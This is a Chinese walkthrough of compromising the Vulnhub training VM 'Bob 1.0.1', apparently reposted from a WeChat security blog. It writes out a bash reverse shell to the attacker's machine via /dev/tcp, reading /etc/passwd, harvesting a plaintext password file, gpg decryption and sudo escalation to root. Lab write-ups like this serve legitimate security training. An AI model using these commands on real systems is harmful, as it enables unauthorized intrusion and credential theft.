靶机信息:
名称:Bob: 1.0.1
下载地址:
https://www.vulnhub.com/entry/bob-101,226
信息收集
-
获取靶机ip地址:
2.详细信息扫描:
3.Nikto是一个开源的WEB扫描评估软件,可以对Web服务器进行多项安全测试,能在230多种服务器上扫描出 2600多种有潜在危险的文件、CGI及其他问题。Nikto使用Perl语言编写运行,Nikto可以扫描指定主机的WEB类型、主机名、指定目录、特定CGI漏洞、返回主机允许的 http模式等.
渗透过程
1.逐个访问目录最后在/dev_shell.php文件下发现点东西,经过测试可以执行linux命令,那么执行反弹shell,使用bash反弹,首先kali开启监听:
2.输入框输入反弹shell代码:
bash -c 'exec bash -i &>/dev/tcp/192.168.10.223/4444 <&1'
3.查看用户,发现了六个用户:
cat /etc/passwd | grep /bin/bash
4.在/home/bob发现了一个名叫.old_passwordfile.html的文件,查看内容发现了两组用户名和密码:
5.使用得到的用户ssh登录
6.在/home/bob/Documents目录下发现了一个login.txt.gpg文件,是个加密文件。
7.继续搜查,发现一个脚本文件,内容是输出一些语句,每行的首字母都是大写,将每一行的大写字母都提取出来 HARPOCRATES,这会不会就是刚刚加密文件的密码?
8.回到加密文件所在的地方,解密试试:
gpg --batch --passphrase HARPOCRATES -d login.txt.gpg
解密之后得到了bob的用户名和密码:
9.使用bob用户登录
ssh bob@192.168.11.151 -p 25468
提权
查看bob有什么权限,发现bob拥有root用户的所有权限,直接切换到root用户,提权成功!
原文始发于微信公众号(网络安全学习爱好者):Vulnhub靶机BOB渗透笔记
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论